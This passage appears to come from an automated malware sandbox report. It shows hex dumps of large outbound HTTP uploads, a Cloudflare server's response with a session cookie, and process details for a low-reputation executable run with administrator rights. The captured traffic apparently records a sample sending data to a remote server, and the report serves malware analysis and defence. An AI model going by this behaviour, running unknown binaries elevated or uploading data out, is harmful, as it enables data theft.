                                                                                              2024-12-27 07:53:06 UTC15331OUTData Raw: 44 e6 ed 38 7a c2 a7 87 54 fd ce 0d 9a 5a 74 7a 65 03 8a ce 7d ee 0c f1 d3 01 e9 70 a4 b9 1f cb a6 31 23 0d 83 cb 94 1b 8f b6 ef cb 99 33 ca 1d b2 ee bd 6a 18 c3 79 b9 57 dc f4 28 76 a4 b1 24 74 6a b3 80 48 4c 24 9a 1b d2 c9 b6 7d 19 b9 f4 6b 73 06 b9 cb 12 65 cd bb 1f 76 c5 22 5e 9b eb d7 62 c3 ce 3b ea 01 12 66 57 e2 d3 4c 82 95 67 14 46 9d 67 3a e7 64 6e e0 52 9f b6 40 57 76 a9 1a 52 93 f8 5c bf e9 b7 ff e8 bc 31 97 a6 83 3b 26 ab d7 0e f4 54 aa e2 6b ab 7d 68 e0 5e d2 c9 e2 d5 60 c3 5d 45 29 52 ed 9a 57 cd a1 3e 88 50 23 61 86 4b 43 30 9e 37 86 7b b3 b8 b3 19 83 39 df 3e 71 b3 09 db d8 98 87 a2 63 5a bf e7 2d f7 84 95 5e f4 de f6 49 53 16 ff f8 a1 6a f3 a6 af f8 58 da 43 48 bf 74 db f3 74 fa 53 23 3d b8 e2 12 f2 e9 9e ef 8a 38 e6 ea 49 d8 4d f7 5c e8
                                                                                              Data Ascii: D8zTZtze}p1#3jyW(v$tjHL$}ksev"^b;fWLgFg:dnR@WvR\1;&Tk}h^`]E)RW>P#aKC07{9>qcZ-^ISjXCHttS#=8IM\
                                                                                              2024-12-27 07:53:06 UTC15331OUTData Raw: 5a 7a 2d b3 36 28 ed 27 55 4a 61 ac 25 85 66 13 44 bb cd 7b cd bc 9f 31 67 bb bf 9e 3e f9 4a 1c a4 7c 1a e8 57 a1 94 6f ec a1 eb 3f 0a 74 f7 6c 59 36 28 1c f8 30 d4 a3 23 7b 66 20 b0 3f e4 f6 61 1e 0c f7 e6 51 c9 99 b5 84 04 8e 44 6a be fc ae 5d 5c 60 8f 12 86 a1 b0 32 7d 90 ad aa 46 75 78 31 5f a5 fb 8c 27 29 f5 eb e3 ad 8c 7d 4e f8 fc 84 fc f8 af b2 84 05 c9 f9 92 da fe 5d fc bf e4 63 02 e9 86 ac d8 fa ad 39 1f e2 c3 85 c4 78 a3 1a 23 0f 74 47 57 5e ca bc 8b 0c 92 c0 9e fb 92 56 63 a0 2b 95 d8 6c 60 3b 53 fd 2c 34 19 8d c4 35 0f fb 37 16 99 60 d2 f3 37 c2 cd e4 42 e5 d6 b8 b9 26 d7 0b be ca 05 dd 3a fb 3c c2 43 af eb c3 6b 38 81 ae dc fe ce 6d a4 02 e3 4e 58 5b 3f 95 df 70 29 f8 4e 48 fa dc f5 36 95 57 37 0d ec 04 e5 de 7c 4f 68 3e 9e 8c f6 2c a4 a8 8e
                                                                                              Data Ascii: Zz-6('UJa%fD{1g>J|Wo?tlY6(0#{f ?aQDj]\`2}Fux1_')}N]c9x#tGW^Vc+l`;S,457`7B&:<Ck8mNX[?p)NH6W7|Oh>,
                                                                                              2024-12-27 07:53:06 UTC15331OUTData Raw: 0b fb e4 9f 44 07 40 7a 8c 43 ac 44 f5 76 11 ea e9 db 8d cf e3 29 92 8e b3 7c e0 60 e3 f4 9f 94 23 44 24 5b 23 b0 24 1d fd 7b fe 33 81 45 80 b9 cb ce 41 ff 42 7a 42 62 5e 0e 23 9c da 52 ba e5 53 81 17 ba 98 b2 2a 76 1f 53 96 b6 fc ac a1 94 24 27 43 9b e2 3a bf 3f bd 14 12 9c e6 33 34 90 e2 f0 85 1a 69 a2 55 b9 fc 45 67 14 85 f7 ac b7 05 f2 40 43 42 a3 3a 76 3b 53 7e 3c 51 a5 15 e7 31 70 b9 d5 3a c2 e7 32 2b 9f 4d dc 7c 87 75 21 0f db 85 de 35 81 d2 83 8b 72 0d 6d 51 46 3b ea 22 ea 1a 84 c2 68 90 83 aa 74 1b 96 04 8e 72 8c fc 53 e5 6a f5 0b 21 0b 7c fa b9 ec e8 63 a5 db 60 89 b1 3e 22 9b 2b 7f 20 9b 94 68 4e d6 e0 5d b6 37 fa 5a 7f 8f a9 5d 3c 3e 52 aa c8 f2 6e ae 10 1f ad 96 70 1d 92 bb 0a a5 37 73 b7 bb 18 e9 c5 7c b4 47 51 fa 5c 24 69 d0 c4 d9 68 39 26
                                                                                              Data Ascii: D@zCDv)|`#D$[#${3EABzBb^#RS*vS$'C:?34iUEg@CB:v;S~<Q1p:2+M|u!5rmQF;"htrSj!|c`>"+ hN]7Z]<>Rnp7s|GQ\$ih9&
                                                                                              2024-12-27 07:53:06 UTC15331OUTData Raw: fe b1 ff cc b5 f8 43 3d f6 2d bf 9c c7 3c 9f 86 24 29 80 d8 b6 8a b9 9c a9 b7 ae dc 0f 48 ae 4b c5 8f a3 14 2f d0 f7 5d c7 74 e3 5e 8c 7f f8 2b 68 e3 02 60 be 5d 88 28 df 1a df c8 13 f1 a1 9d 99 d6 0f f4 ec ce 30 de 19 ee dd b4 fa 2d 1f f3 a7 e0 08 66 e9 51 ae ff d8 95 0c 73 31 d7 9d ef a7 8b 35 c5 dd 1e 63 07 e2 20 e4 50 88 d4 dc 3f b7 4f 4a bd f4 25 60 90 23 37 ec f5 20 47 dd f9 56 42 ed c9 f4 54 11 33 41 56 e1 c8 c4 84 80 9a 5e 6b 12 ca fe 0e d7 fa c4 a1 8a ff 33 21 72 ab 33 de 15 31 ba 0b 7a 2a 77 7b 08 af c4 b1 69 97 7e e3 0a a6 da 5f 74 68 da 7c 6b 37 bd 0f 51 c2 b2 8b 5c 41 b3 95 bf 64 d3 48 36 e8 88 26 a0 61 14 f9 9c 22 50 ff 2f 08 63 fd eb 48 8c cf 2f 69 7f 97 c1 76 c3 05 fe 10 a9 fd 04 ab a7 b1 b2 c8 32 2f 00 4b 00 fc af f9 ce 66 cd 09 30 1d 41
                                                                                              Data Ascii: C=-<$)HK/]t^+h`](0-fQs15c P?OJ%`#7 GVBT3AV^k3!r31z*w{i~_th|k7Q\AdH6&a"P/cH/iv2/Kf0A
                                                                                              2024-12-27 07:53:06 UTC15331OUTData Raw: 5a 0f 63 2c bb 4d c2 b2 f2 33 02 fd 94 07 e5 de 1d 69 40 10 1e 6e 6d 2f 71 99 37 27 b4 7a a5 bc ed 36 a7 86 0a 17 c5 44 e7 4d de 7f 4f 8a 98 75 d1 65 9d 26 73 42 b9 e4 92 08 66 61 f1 ad c9 09 fe 10 cc e8 e3 35 3d e4 cf a0 8f ed da a7 22 3a eb 75 f3 46 a9 49 5e df 62 ca fa e3 e7 b1 6b 76 da 6c 2c f3 83 7c c3 b1 98 77 ae 96 b3 ba e6 a6 68 f2 73 4e c6 bb 6d 51 e3 8d 6c aa d8 1a 1c 00 07 f1 b2 03 e2 87 be 15 dc 94 50 dc 08 c7 20 19 31 e5 a9 34 b7 b9 34 47 84 d3 e5 9d 69 fb 09 6d a2 1f 02 50 9d e5 5a 96 5a 06 1c 55 03 c4 1f 44 83 2c c1 84 66 62 6e ac b1 86 6d 23 88 02 e5 20 f0 6a c2 f5 31 bf 67 a2 e1 8d bb 04 1f fe 9e 4a d8 28 cb 4b d8 3a 6e c7 d8 bc 9c 29 eb 11 c9 4e 9a c8 a6 79 d5 47 aa b1 13 f6 d3 50 28 ed 6f 54 38 ea 0d 69 77 63 98 fe 52 f2 37 aa 3a bb a3
                                                                                              Data Ascii: Zc,M3i@nm/q7'z6DMOue&sBfa5=":uFI^bkvl,|whsNmQlP 144GimPZZUD,fbnm# j1gJ(K:n)NyGP(oT8iwcR7:
                                                                                              2024-12-27 07:53:06 UTC15331OUTData Raw: ef 6e e6 16 15 1c 2c 4b 06 3d a1 4e 98 7d 99 50 0c 1b 57 71 01 43 4f b0 78 50 c8 29 1d dd 21 78 c0 8d 12 7e f3 91 c7 07 a7 d8 85 6d 78 11 85 30 47 7e 96 99 43 7d 69 f0 d4 2d d4 86 aa d1 b6 bf d0 06 24 72 23 c9 23 0c 0d 62 55 78 22 3a 43 cc ea da 69 ab 4a f5 cb 97 a2 94 54 aa 49 2b d0 2f b3 f4 99 dc 7b ae 33 22 5d c1 c4 b8 88 d8 b8 d8 3b 87 d5 e4 9d 62 c5 66 25 97 10 82 53 96 c5 f1 1e 83 01 19 d9 b8 1d cc 4e 9d f4 7a 9d 88 b3 97 a8 fd 88 82 f6 7e 9c b7 07 df f4 cf 37 2b f4 1d cb 5a c9 d6 66 86 82 b6 93 d8 69 97 d7 b8 9d 55 6c ec b2 c4 df 77 cb 16 6b 6f 0f 89 b7 7a c4 25 b0 76 8f 2a 16 0a 0e 87 b8 f3 3e 9b 15 f0 17 cb c1 0f 6e 63 fa 8b 22 78 62 85 86 7f f9 ce cd 51 a2 ee 27 65 5a fe 43 4a 0a d1 e6 79 dd 1d c9 4e b3 e6 4b 62 3e a2 b7 ea 3e d5 62 d7 d5 97 79
                                                                                              Data Ascii: n,K=N}PWqCOxP)!x~mx0G~C}i-$r##bUx":CiJTI+/{3"];bf%SNz~7+ZfiUlwkoz%v*>nc"xbQ'eZCJyNKb>>by
                                                                                              2024-12-27 07:53:06 UTC15331OUTData Raw: 9b 38 de f1 c3 c7 ac 7e 32 8c 51 fe 2c 4d 16 eb 81 3f 7e 24 da 90 f4 f9 b0 ee fb c1 05 cd c4 d3 a3 25 59 8b 5a 8c c7 58 c4 1f f1 41 a7 86 5b d4 e5 be 23 17 9a ed 2f ef a7 a7 82 3a 45 2f 08 1e 7a 94 d0 2a 09 f4 2e 9c e2 03 8f e4 c3 0d f9 c1 ac c3 df ef a3 77 d0 bc f5 a8 27 0b 3c 21 d7 72 5a 7b 9b 6c c1 13 fe bc e2 a2 6d b8 d6 52 4c 08 12 f0 43 f9 3c 77 13 eb ef 7c 95 fd 7d 25 57 98 e6 36 04 08 41 98 f3 90 05 1a 3e c7 ae e7 90 2d 2d 23 74 ab b8 78 1a 4f 0f 8f 6e 94 e0 6c 1d 63 24 19 07 a6 f3 69 36 2a b4 ca 3c 4d 33 fc ea a8 48 ac 79 41 5f 7d e5 f6 ed e1 07 3e b6 5b 18 0b 02 fe 0d ec 5f 2c 57 75 fe 8f 01 94 dd 26 f0 e2 a9 cd cb 00 ee 14 68 d8 60 62 c8 db f0 6e 69 48 ab f8 ec 91 e7 31 a2 75 c6 78 25 1a f1 c4 27 dd db 8c 22 70 4b d1 5a 31 d8 cb 16 50 e2 47 14
                                                                                              Data Ascii: 8~2Q,M?~$%YZXA[#/:E/z*.w'<!rZ{lmRLC<w|}%W6A>--#txOnlc$i6*<M3HyA_}>[_,Wu&h`bniH1ux%'"pKZ1PG
                                                                                              2024-12-27 07:53:10 UTC1137INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 07:53:10 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=cfk2qlht46gncg67ng73846cd8; expires=Tue, 22 Apr 2025 01:39:47 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Knf4rI%2BMP%2B5pKqvc9KdO0u%2BvLUrYW32ei5N0Ww75wTFntjcNAgOYUpY1OHNYncLea9GlrA0AKHcPIhBZVXXiBD2%2BR3mFBzmHNJ5CIa%2BXE0NhAbacbtHkdoaAE0CzL%2BNnsbo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f87bc2b0fd9c326-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1490&min_rtt=1488&rtt_var=562&sent=304&recv=571&lost=0&retrans=0&sent_bytes=2838&recv_bytes=553344&delivery_rate=1940199&cwnd=240&unsent_bytes=0&cid=bcfa799b13356755&ts=4134&x=0"


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:02:52:41
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Users\user\Desktop\ARoqFi68Nr.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\ARoqFi68Nr.exe"
                                                                                              Imagebase:0x560000
                                                                                              File size:2'935'296 bytes
                                                                                              MD5 hash:D867E39681DBE1564BCDD21D773E668B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Disassembly

                                                                                              No disassembly